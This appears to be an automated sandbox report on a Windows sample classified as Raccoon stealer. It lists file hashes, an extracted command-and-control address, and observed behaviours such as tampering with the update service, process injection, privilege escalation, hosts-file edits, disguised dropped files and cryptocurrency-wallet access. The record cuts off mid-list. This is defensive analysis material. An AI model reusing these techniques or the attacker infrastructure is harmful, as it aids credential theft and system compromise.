Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
126s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
08/09/2022, 00:01
Static task
static1
General
-
Target
d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe
-
Size
386KB
-
MD5
1b318f1b8b06927c70445fb204cde589
-
SHA1
424c22ee84b9b94efe8cd9f9d8c15a3cbfb2837b
-
SHA256
d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4
-
SHA512
3c1779c3f9fc02fa43e0746b39f44755121a6a58c0cb6b9b2253b22f538aaff144955308c8580956f943ac17d62fbc9744fe730c21320eef142c11890acab2a6
-
SSDEEP
12288:p+1TAJgO0d5vgEiySZhb0sJYuVka7CpNIc3r:I1OEifHb08Xk
Malware Config
Extracted
raccoon
654b3e7f2d409dcde795b5d2dacf4955
http://46.249.58.152/
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe -
Suspicious use of NtCreateProcessExOtherParentProcess 13 IoCs
description pid Process procid_target PID 4780 created 3276 4780 WerFault.exe 38 PID 2544 created 4164 2544 WerFault.exe 33 PID 1684 created 2404 1684 WerFault.exe 189 PID 4868 created 2500 4868 WerFault.exe 190 PID 2864 created 832 2864 WerFault.exe 195 PID 2332 created 408 2332 WerFault.exe 197 PID 4740 created 1732 4740 WerFault.exe 201 PID 1716 created 4620 1716 WerFault.exe 207 PID 1228 created 4744 1228 DllHost.exe 213 PID 4192 created 4236 4192 WerFault.exe 216 PID 3280 created 1948 3280 WerFault.exe 219 PID 4556 created 3084 4556 WerFault.exe 222 PID 944 created 1240 944 WerFault.exe 225 -
Suspicious use of NtCreateUserProcessOtherParentProcess 17 IoCs
description pid Process procid_target PID 3516 created 580 3516 powershell.EXE 3 PID 4540 created 3276 4540 svchost.exe 38 PID 4540 created 4164 4540 svchost.exe 33 PID 1140 created 580 1140 powershell.EXE 3 PID 4540 created 2404 4540 svchost.exe 189 PID 4540 created 2500 4540 svchost.exe 190 PID 4540 created 832 4540 svchost.exe 195 PID 4540 created 408 4540 svchost.exe 197 PID 4540 created 1732 4540 svchost.exe 201 PID 4540 created 2400 4540 svchost.exe 202 PID 4540 created 4336 4540 svchost.exe 208 PID 4540 created 4620 4540 svchost.exe 207 PID 4540 created 4744 4540 svchost.exe 213 PID 4540 created 4236 4540 svchost.exe 216 PID 4540 created 1948 4540 svchost.exe 219 PID 4540 created 3084 4540 svchost.exe 222 PID 4540 created 1240 4540 svchost.exe 225 -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 4 IoCs
pid Process 4352 Zd60uZ7J.exe 2252 conhost.exe 2444 update.exe 1496 dialer.exe -
Possible privilege escalation attempt 4 IoCs
pid Process 3484 takeown.exe 4964 icacls.exe 4764 takeown.exe 4996 icacls.exe -
Stops running service(s) 3 TTPs
-
Loads dropped DLL 3 IoCs
pid Process 2448 AppLaunch.exe 2448 AppLaunch.exe 2448 AppLaunch.exe -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 3484 takeown.exe 4964 icacls.exe 4764 takeown.exe 4996 icacls.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 13 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\42B1.tmp conhost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 4944 set thread context of 2448 4944 d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe 83 PID 2424 set thread context of 2252 2424 conhost.exe 118 PID 3516 set thread context of 4060 3516 powershell.EXE 137 PID 1140 set thread context of 4264 1140 powershell.EXE 149 PID 908 set thread context of 1496 908 conhost.exe 184 -
Drops file in Program Files directory 3 IoCs
description ioc Process File opened for modification C:\Program Files\Platform\Defender\update.exe conhost.exe File created C:\Program Files\Google\Libs\WR64.sys conhost.exe File created C:\Program Files\Platform\Defender\update.exe conhost.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe File created C:\Windows\Tasks\dialersvc32.job conhost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1904 sc.exe 3632 sc.exe 736 sc.exe 4544 sc.exe 4668 sc.exe 2656 sc.exe 4184 sc.exe 4584 sc.exe 4516 sc.exe 4904 sc.exe -
Program crash 32 IoCs
pid pid_target Process procid_target 2160 3276 WerFault.exe 38 4668 4164 WerFault.exe 33 3720 2404 WerFault.exe 189 4668 2500 WerFault.exe 190 3012 832 WerFault.exe 195 1680 408 WerFault.exe 197 3448 1732 WerFault.exe 201 3456 2400 WerFault.exe 202 940 4336 WerFault.exe 208 4256 4620 WerFault.exe 207 1952 4744 WerFault.exe 213 1892 4236 WerFault.exe 216 4544 1948 WerFault.exe 219 1140 3084 WerFault.exe 222 3712 1240 WerFault.exe 225 1940 3684 WerFault.exe 228 1864 1036 WerFault.exe 231 2916 3148 WerFault.exe 234 3632 2424 WerFault.exe 237 3692 4476 WerFault.exe 240 5004 1228 WerFault.exe 243 4644 3132 WerFault.exe 246 4544 224 WerFault.exe 249 2732 4240 WerFault.exe 252 4324 4860 WerFault.exe 255 3100 1644 WerFault.exe 258 2432 3448 WerFault.exe 261 1732 3120 WerFault.exe 264 1436 3772 WerFault.exe 267 3424 3860 WerFault.exe 270 2928 4688 WerFault.exe 273 3720 4940 WerFault.exe 276 -
Checks processor information in registry 2 TTPs 45 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 30 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE -
Modifies registry key 1 TTPs 18 IoCs
pid Process 2032 reg.exe 4620 reg.exe 2500 reg.exe 4572 reg.exe 2640 reg.exe 3992 reg.exe 1384 reg.exe 3712 reg.exe 2732 reg.exe 3100 reg.exe 1136 reg.exe 1064 reg.exe 5088 reg.exe 2260 reg.exe 3888 reg.exe 2452 reg.exe 4152 reg.exe 3388 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 612 powershell.exe 612 powershell.exe 3864 powershell.exe 3864 powershell.exe 2424 conhost.exe 3516 powershell.EXE 3516 powershell.EXE 3516 powershell.EXE 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 1140 powershell.EXE 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 2160 WerFault.exe 2160 WerFault.exe 4060 dllhost.exe 4060 dllhost.exe 4668 WerFault.exe 4668 WerFault.exe 4060 dllhost.exe 4060 dllhost.exe 1140 powershell.EXE 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4540 svchost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe 4060 dllhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 652 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 612 powershell.exe Token: SeShutdownPrivilege 1256 powercfg.exe Token: SeCreatePagefilePrivilege 1256 powercfg.exe Token: SeShutdownPrivilege 2192 powercfg.exe Token: SeCreatePagefilePrivilege 2192 powercfg.exe Token: SeDebugPrivilege 3864 powershell.exe Token: SeShutdownPrivilege 3676 powercfg.exe Token: SeCreatePagefilePrivilege 3676 powercfg.exe Token: SeShutdownPrivilege 1068 powercfg.exe Token: SeCreatePagefilePrivilege 1068 powercfg.exe Token: SeTakeOwnershipPrivilege 3484 takeown.exe Token: SeIncreaseQuotaPrivilege 3864 powershell.exe Token: SeSecurityPrivilege 3864 powershell.exe Token: SeTakeOwnershipPrivilege 3864 powershell.exe Token: SeLoadDriverPrivilege 3864 powershell.exe Token: SeSystemProfilePrivilege 3864 powershell.exe Token: SeSystemtimePrivilege 3864 powershell.exe Token: SeProfSingleProcessPrivilege 3864 powershell.exe Token: SeIncBasePriorityPrivilege 3864 powershell.exe Token: SeCreatePagefilePrivilege 3864 powershell.exe Token: SeBackupPrivilege 3864 powershell.exe Token: SeRestorePrivilege 3864 powershell.exe Token: SeShutdownPrivilege 3864 powershell.exe Token: SeDebugPrivilege 3864 powershell.exe Token: SeSystemEnvironmentPrivilege 3864 powershell.exe Token: SeRemoteShutdownPrivilege 3864 powershell.exe Token: SeUndockPrivilege 3864 powershell.exe Token: SeManageVolumePrivilege 3864 powershell.exe Token: 33 3864 powershell.exe Token: 34 3864 powershell.exe Token: 35 3864 powershell.exe Token: 36 3864 powershell.exe Token: SeIncreaseQuotaPrivilege 3864 powershell.exe Token: SeSecurityPrivilege 3864 powershell.exe Token: SeTakeOwnershipPrivilege 3864 powershell.exe Token: SeLoadDriverPrivilege 3864 powershell.exe Token: SeSystemProfilePrivilege 3864 powershell.exe Token: SeSystemtimePrivilege 3864 powershell.exe Token: SeProfSingleProcessPrivilege 3864 powershell.exe Token: SeIncBasePriorityPrivilege 3864 powershell.exe Token: SeCreatePagefilePrivilege 3864 powershell.exe Token: SeBackupPrivilege 3864 powershell.exe Token: SeRestorePrivilege 3864 powershell.exe Token: SeShutdownPrivilege 3864 powershell.exe Token: SeDebugPrivilege 3864 powershell.exe Token: SeSystemEnvironmentPrivilege 3864 powershell.exe Token: SeRemoteShutdownPrivilege 3864 powershell.exe Token: SeUndockPrivilege 3864 powershell.exe Token: SeManageVolumePrivilege 3864 powershell.exe Token: 33 3864 powershell.exe Token: 34 3864 powershell.exe Token: 35 3864 powershell.exe Token: 36 3864 powershell.exe Token: SeIncreaseQuotaPrivilege 3864 powershell.exe Token: SeSecurityPrivilege 3864 powershell.exe Token: SeTakeOwnershipPrivilege 3864 powershell.exe Token: SeLoadDriverPrivilege 3864 powershell.exe Token: SeSystemProfilePrivilege 3864 powershell.exe Token: SeSystemtimePrivilege 3864 powershell.exe Token: SeProfSingleProcessPrivilege 3864 powershell.exe Token: SeIncBasePriorityPrivilege 3864 powershell.exe Token: SeCreatePagefilePrivilege 3864 powershell.exe Token: SeBackupPrivilege 3864 powershell.exe Token: SeRestorePrivilege 3864 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4408 Conhost.exe 4280 Conhost.exe 3124 Conhost.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 2564 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4944 wrote to memory of 2448 4944 d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe 83 PID 4944 wrote to memory of 2448 4944 d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe 83 PID 4944 wrote to memory of 2448 4944 d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe 83 PID 4944 wrote to memory of 2448 4944 d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe 83 PID 4944 wrote to memory of 2448 4944 d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe 83 PID 2448 wrote to memory of 4352 2448 AppLaunch.exe 90 PID 2448 wrote to memory of 4352 2448 AppLaunch.exe 90 PID 4352 wrote to memory of 2424 4352 Zd60uZ7J.exe 93 PID 4352 wrote to memory of 2424 4352 Zd60uZ7J.exe 93 PID 4352 wrote to memory of 2424 4352 Zd60uZ7J.exe 93 PID 2424 wrote to memory of 612 2424 conhost.exe 94 PID 2424 wrote to memory of 612 